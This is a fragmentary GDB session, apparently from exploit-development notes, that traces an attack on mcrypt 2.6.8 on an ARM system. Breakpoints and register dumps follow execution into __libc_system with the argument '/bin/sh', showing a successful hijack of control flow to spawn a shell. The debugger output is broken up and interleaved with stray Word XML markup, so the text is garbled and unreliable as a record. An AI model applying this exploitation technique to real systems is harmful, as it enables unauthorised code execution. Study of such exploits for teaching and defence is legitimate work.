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~/Desktop/hpconarm/exploits/mcrypt-2.6.8 $ gdb --args src/mcrypt -d cyberpunk.nc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 *0x000131cc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1 at 0x131cc: file mcrypt.c, line 392.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program: /home/pi/Desktop/hpconarm/exploits/mcrypt-2.6.8/src/mcrypt -d cyberpunk.nc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1, 0x000131cc in __do_global_dtors_aux () at mcrypt.c:392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ab/>
        <w:t xml:space="preserve"> fprintf(stderr, _("Error in algorithm '%s'.\n"), algorithm);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0x58ed0             364240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0x7effeb68          0x7effeb68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0x131cc             0x131cc &lt;__do_global_dtors_aux+32&gt;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get_env_key () at environ.c:49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ab/>
        <w:t xml:space="preserve">return tmp;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0x76edcb6c          1995295596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0x58ed0             364240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0x7effeb70          0x7effeb70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0x1513c             0x1513c &lt;get_env_key+44&gt;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0x00015140</w:t>
        <w:tab/>
        <w:t xml:space="preserve">49</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">return tmp;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0x76edcb6c          1995295596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0x76edcb6c          1995295596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0x58ed0             364240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0x7effeb70          0x7effeb70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0x15140             0x15140 &lt;get_env_key+48&gt;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__libc_system (line=0x76edcb6c "/bin/sh") at ../sysdeps/posix/system.c:180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../sysdeps/posix/system.c: No such file or directory.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0x76edcb6c          1995295596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0x31000             200704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0x58ed0             364240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0x7effeb78          0x7effeb78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0x76de99c8          0x76de99c8 &lt;__libc_system&gt;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